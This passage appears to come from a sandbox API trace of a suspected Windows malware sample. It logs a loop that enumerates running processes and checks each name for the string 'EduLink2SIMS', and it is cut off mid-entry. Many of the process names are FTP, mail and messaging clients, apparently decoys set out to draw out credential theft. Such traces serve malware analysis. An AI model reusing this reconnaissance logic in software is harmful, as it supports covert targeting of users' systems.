th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0100.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.946] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356e928 [0100.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x356e928, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0100.946] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0100.946] StrStrIA (lpFirst="powell_jane.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.946] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0100.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.947] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357d628 [0100.947] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x357d628, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0100.947] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0100.947] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.948] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0100.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0100.949] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x356e8b0 [0100.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x356e8b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0100.949] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0100.949] StrStrIA (lpFirst="gainedshape.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.949] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0100.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.950] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d668 [0100.950] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x357d668, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0100.950] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0100.950] StrStrIA (lpFirst="opens-versions.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.950] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0100.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0100.951] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x357e7f8 [0100.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x357e7f8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0100.951] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0100.951] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.952] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0100.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.953] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356e8c8 [0100.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x356e8c8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0100.953] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0100.953] StrStrIA (lpFirst="3dftp.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.953] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0100.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.954] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d768 [0100.954] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x357d768, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0100.954] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0100.954] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.954] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0100.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.955] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356e8f8 [0100.955] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x356e8f8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0100.955] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0100.955] StrStrIA (lpFirst="alftp.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.955] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0100.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.956] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356e958 [0100.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x356e958, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0100.956] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0100.956] StrStrIA (lpFirst="barca.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.956] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0100.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.958] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e970 [0100.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x356e970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0100.958] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0100.958] StrStrIA (lpFirst="bitkinex.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.958] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0100.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.959] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356e6a0 [0100.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x356e6a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0100.959] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0100.959] StrStrIA (lpFirst="coreftp.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.959] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0100.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0100.960] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e228 [0100.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x357e228, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0100.960] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0100.960] StrStrIA (lpFirst="far.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.960] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0100.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.961] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356e6b8 [0100.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x356e6b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0100.961] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0100.961] StrStrIA (lpFirst="filezilla.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.961] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0100.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.962] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356e748 [0100.962] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x356e748, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0100.962] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0100.962] StrStrIA (lpFirst="flashfxp.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.962] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0100.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.963] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356e718 [0100.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x356e718, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0100.963] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0100.964] StrStrIA (lpFirst="fling.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.964] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0100.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0100.992] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357d4a8 [0100.992] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x357d4a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0100.992] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0100.992] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.992] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0100.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0100.993] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357d528 [0100.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x357d528, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0100.993] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0100.993] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.993] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0100.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0100.994] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x357e288 [0100.994] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x357e288, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0100.994] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0100.994] StrStrIA (lpFirst="icq.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.994] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0100.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.995] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x356eb20 [0100.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x356eb20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0100.995] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0100.995] StrStrIA (lpFirst="leechftp.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.995] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0100.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.996] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x356ec70 [0100.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x356ec70, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0100.996] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0100.996] StrStrIA (lpFirst="ncftp.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.996] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0100.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.997] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x356ebf8 [0100.997] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x356ebf8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0100.997] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0100.997] StrStrIA (lpFirst="notepad.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.998] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0100.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0100.998] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x356ebb0 [0100.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x356ebb0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0100.998] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0100.999] StrStrIA (lpFirst="operamail.exe", lpSrch="EduLink2SIMS") returned 0x0 [0100.999] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0101.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0101.000] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x356ec10 [0101.000] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x356ec10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0101.000] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: 